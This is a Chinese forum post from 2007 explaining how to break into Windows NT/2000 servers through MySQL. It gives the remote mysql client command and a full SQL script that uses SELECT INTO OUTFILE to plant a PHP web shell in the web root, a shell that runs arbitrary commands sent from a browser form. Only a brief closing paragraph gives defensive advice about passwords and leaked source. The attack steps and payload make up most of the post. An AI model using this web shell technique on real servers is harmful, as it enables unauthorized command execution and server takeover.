首页
Portal
业界资讯
社区
BBS
我的家园
Space
个人空间
导读
Guide
登录
/
注册
用户名
Email
自动登录
找回密码
密码
登录
注册
搜索
搜索
本版
帖子
用户
本版
帖子
用户
帖子
好友
道具
勋章
收藏
任务
淘帖
门户
导读
设置
我的收藏
退出
腾讯QQ
微信登录
首页
›
≡≡网络技术≡≡
›
数据库
›
通过mysql入侵NT和win2000
返回列表
通过mysql入侵NT和win2000
[ 复制链接 ]
灰儿
2007-10-4 07:23:16
许多NT和win2000机器上面装有mysql和php。而mysql默认数据库root账号为空,这就给入侵者一个途径来入侵该机器。如果修改了数据库root的账号密码,而IIS的一些其他漏洞导致源代码泄漏也可能看到数据库的账号和密码。假设我们已经拿到了数据库的密码,看看我们如何通过mysql数据库来获得该机器的一定权限。 <BR>首先通常情况下,一般mysql和php配合使用,大多数NT和win2000的机器上如果使用php一般都会使用mysql。而默认情况下windows上的mysql是允许远程连接的。而装在linux等上的mysql是不允许远程连接的。入侵的思路是写一个shell脚本到web目录。就可以通过这个shell教本来执行命令了。而一般情况下,windows的web服务器是IIS,默认也是支持asp脚本的。网上也随处可见asp的sehll脚本,只要将这个asp的脚本传到web目录就好了。但是我觉得那些脚本都比较麻烦。而如果目标机器上面有php的话就可以用php脚本了。在这里我用php脚本来写shell。首先我们要用mysql的客户端连结到该机器,并执行我们的sql语句来在web目录生成php的shell脚本。 <BR>C:\mysql\bin>mysql -h xxx.xxx.xxx.xxx -uroot <php.sql <BR><BR>C:\mysql\bin> <BR><BR>下面是php.sql的内容: <BR>use test; <BR>create table tmp(cmd TEXT); <BR>insert into tmp values('<body onload=document.form1.cmd.focus()><?if (isset($cmd)){$cmd=stripslashes($cmd);exec(\"$cmd > temp.dat\");}?><style type=\"text/css\"><!\-\- .form1 {BACKGROUND: #FFFFFF; BORDER-BOTTOM: #666666 1px solid; BORDER-LEFT: #666666 1px solid; BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; COLOR: #3c464f; FONT-SIZE: 9pt; clip: rect( ); cursor: text; height: auto; width: auto; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px\-\-></style><p class=\"title2\"> </p><form name=\"form1\" method=\\"post\" action=\"/cmd2.php\"> <input type=\"text\" name=\"cmd\" size=\"50\" class=\"form1\"></form><form name=\"form2\" method=\"post\" action=\"\"> <p> <textarea name=\"text\" cols=\"120\" rows=\"50\" class=\"form1\"><?if(isset($cmd)){readfile(\"temp.dat\");unlink(\"temp.dat\");}?></textarea> </p></form></body>'); <BR>select * from tmp into outfile 'd:\\new\\cmd2.php'; <BR>drop table tmp; <BR><BR>上面的sql语句是创建一个名字为tmp的table,将脚本输入到数据库,然后再将这个脚本保存成d:\new\cmd2.php。然后删除tmp这个我们创建的table。这里的d:\new的目录是该机器的web目录。然后我们就可以在浏览器中输入http://xxx.xxx.xxx.xxx/cmd2.php,就可以利用这个shell执行命令了。至此我们已经获得了该网站的一个guest权限的shell了。我们可以通过这个shell脚本写个ftp脚本来上传文件,也可以利用这个shell来进行其他guest权限能够执行的一些东东了。这里需要注意的是如果cmd2.php已经存在了这个sql脚本是不能运行成功的。这个php脚本不能写成功。 <BR>关键的问题在于获得数据库的密码并且能够找到web目录。然后一切都不成问题了。 <BR>安全建议:设置mysql数据库的密码,并且要有一定的强度。设置好IIS避免泄漏源代码,不要直接在web目录编辑脚本等文件,因为有些编辑器会自动产生一个备份文件,一般为.bak的扩展名,这样恶意攻击者就可能直接打开这个.bak文件从而泄漏源代码,比如global.asa.bak。 <BR>
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
注册
回复
本版积分规则
回帖后跳转到最后一页
灰儿
管理员
9843篇
主题总数
7
总热度
提问
+关注
产品动态
2024-05-18
泛微E10(e-cology)文件存储服务器每日新增大量重复文件的原因
2024-05-16
泛微E10(e-cology)配置文件详解
2024-05-15
泛微(weaver)e-cology_V10公文管理,启用预览正文和套红预览功能
2024-05-14
泛微E10(e-cology)文件存储位置与打开方式
2024-05-14
神州数码云科(DCN) DCME-320路由器关闭互联网22、23、53端口方法
2024-05-13
关于webapp与WEB-INF的记录
2024-05-13
泛微(weaver)e-cology_V10公文管理,上传套红模板教程
2024-05-13
防火墙指标:吞吐量、时延、新建连接速率、并发连接数
热点推荐
1
泛微E10(e-cology)文件存储服务器每日新增大量重复文件的原因
2
泛微E10(e-cology)配置文件详解
3
泛微(weaver)e-cology_V10公文管理,启用预览正文和套红预览功能
4
泛微E10(e-cology)文件存储位置与打开方式
5
神州数码云科(DCN) DCME-320路由器关闭互联网22、23、53端口方法
6
关于webapp与WEB-INF的记录
7
泛微(weaver)e-cology_V10公文管理,上传套红模板教程
8
防火墙指标:吞吐量、时延、新建连接速率、并发连接数
热门板块
PC操作系统
启动和引导
手机操作系统
硬件相关
办公软件
多媒体技术
产品动态
2024-05-18
泛微E10(e-cology)文件存储服务器每日新增大量重复文件的原因
2024-05-16
泛微E10(e-cology)配置文件详解
2024-05-15
泛微(weaver)e-cology_V10公文管理,启用预览正文和套红预览功能
2024-05-14
泛微E10(e-cology)文件存储位置与打开方式
2024-05-14
神州数码云科(DCN) DCME-320路由器关闭互联网22、23、53端口方法
2024-05-13
关于webapp与WEB-INF的记录
2024-05-13
泛微(weaver)e-cology_V10公文管理,上传套红模板教程
2024-05-13
防火墙指标:吞吐量、时延、新建连接速率、并发连接数
热点推荐
1
泛微E10(e-cology)文件存储服务器每日新增大量重复文件的原因
2
泛微E10(e-cology)配置文件详解
3
泛微(weaver)e-cology_V10公文管理,启用预览正文和套红预览功能
4
泛微E10(e-cology)文件存储位置与打开方式
5
神州数码云科(DCN) DCME-320路由器关闭互联网22、23、53端口方法
6
关于webapp与WEB-INF的记录
7
泛微(weaver)e-cology_V10公文管理,上传套红模板教程
8
防火墙指标:吞吐量、时延、新建连接速率、并发连接数
热门板块
PC操作系统
启动和引导
手机操作系统
硬件相关
办公软件
多媒体技术
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言
了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言
了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。